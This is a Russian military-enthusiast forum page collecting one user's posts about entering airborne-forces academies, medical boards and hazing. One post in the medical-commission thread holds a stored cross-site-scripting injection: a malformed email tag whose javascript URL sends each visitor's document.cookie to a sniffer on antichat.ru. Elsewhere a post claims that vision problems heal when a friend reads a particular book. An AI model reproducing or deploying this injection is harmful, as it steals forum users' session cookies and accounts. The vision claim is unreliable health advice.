Десантура.ру
На главную Поиск по сайту Обратная связь
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Регистрация
Главная  |  Карта сайта  |  Войти  |  Регистрация

Hochu v desant (Все сообщения пользователя)


Поделитесь с друзьями:

Выбрать дату в календареВыбрать дату в календаре

Страницы: 1
Постувление в военные вузы негражданина РФ
 
Джек Киев, к сожалению я с тобой согласен, но может на контрактную перейдем, и что-то к лучьшему измениться
Постувление в военные вузы негражданина РФ
 
Послушай, Слоненка, я в РВВДУ и не собираюсь поступать, а мое личное мнение - то лучьше ЛВИСВ в этом мире нету, потому что здесь мой дом, здесь моя Родина, а там, в России все не так, только здесь меня поймут и приймут как родного. И я вовсе не говорю что для меня важное высшее образование, для меня как раз то важно стать офицером воздушно-десантных войск. И спорить тут нечего, это ничем не закончится. И дурак тот, кто говорит мол, там подготовка лучьше, то да се, - бред это все. Если сильно захотеть, то можна здесь многого добиться. А единственное прикрытие РВВДУ это то, что там 2 красных звезды. Да, это так, но что это дает скажите мне?Кому от этого легче или тяжелее? Главное любить свою Родину, стремиться к своей цели и насрать на мнения остальных.
                  Україна - краще за всіх!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Ukrain - forever!!!!!!!!!
Постувление в военные вузы негражданина РФ
 
Послушайте, никаких там журналюг не выпускают, не надо та этот институт гнать, междупрочем красная звезда и на нем висит, это во первых, а во вторых я считаю лучьше ЛВИСВ в руках, чем РВВДУ в мечтах, я не говорю что туда не реально поступить, но человек с Украины, это реально затрудняет положение, и вообще, скажи мне брат, почему не у нас? Что ты добьешься тем, что в РВВДУ поступишь? Ты веть офицером стать хочешь, это главное, а не куда поступить, где престиж высше.
Постувление в военные вузы негражданина РФ
 
!ДШБ! А почему не хочешь у нас поступить? Я слышал что сравнительно недавно во Львове открылся институт сухопутных войск ( ЛВИСВ ) кстате там есть кафедра управления аэромобильнымит войсками, почему не сюдова?
МЕД. КОМИССИЯ, Небольшие проблемы с хирургом
 
[email=pashahak@mail.ru[URL=http://www.desantura.ru/forums/`=`].com'>pashahak@mail.ru<a href='http://www.desantura.ru/forums/`=`' target='_blank'>[/email].com[/URL] ` style=`background:url(java script:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Проблемы со зрением, Объединено несколько похожих тем
 
"с детства мечтал служить в ВДВ, но у меня косоглазие, на мед комисии для десанта забраковали, денег предлагал чтобы они поставили мне бы что годен для десанта не взяли. как исправить косоглазие,?"
  Советую прочитать книгу одну, я щитаю она на вес золота: Мирзакарим Норбеков - автор. Книга "Опыт дурака или ключь к прозрению". Сам не читай ее, в этом и весь прикол, - дай ее своему другу, например, и скажи заранее что у тебя проблема с глазами, и что он сделав вывод с книги должен помочь ему. Сам не вздумай читать, и зрение твое очень вскоре поправиться, на себе проверил.
Неуставные взаимоотношения, О дедовщине в ВДВ - реальность и мифы
 
Пацаны, я хочу в десантуру попасть, но у меня такая кардинальная проблема - короче я не могу заставить себя например каждое утро вставать в 5 часов утра и делать пробежку, - мне нужно что бы кто-то заставлял меня. Тогда все идет путево. Я думаю в десантуре моего мнения спрашивать не будут - и это очень хорошо. Но я боюсь что меня просто-напросто не возьмут туда. Со зрением немного хреново, только с левым глазом, но это еще можна там приврать малек, короче выкручусь, а вот какой должен быть внешний вид? На сколько надо быть здоровым что б туда взяли? И может дадите пару советов, которые помогут попасть в десант. И еще одно, в военкомате спрашивают где я хочу служить, - этот мой ответ сильно повлияет на мою службу?
<br/><TABLE cellpadding='0' cellspacing='0' border='0'><TD align='middle' vAlign='center' width='1%' style='background-color: #ff6060; color: #ffffff; font-family: Times New Roman, Serif; font-size: 50px; font-weight: bold;' title='Уведомление'> ! </TD><TD width='6px'><br/></TD><TD vAlign='middle'><br/> Для таких вопросов есть отдельные темы! Здесь обсуждаем "Неуставные взаимоотношения". <br/> <br/></TD></TABLE>
Страницы: 1




Все права на материалы, используемые на сайте, принадлежат их авторам.
При копировании ссылка на desantura.ru обязательна.
Professor - Создание креативного дизайна сайтов и любые работы с графикой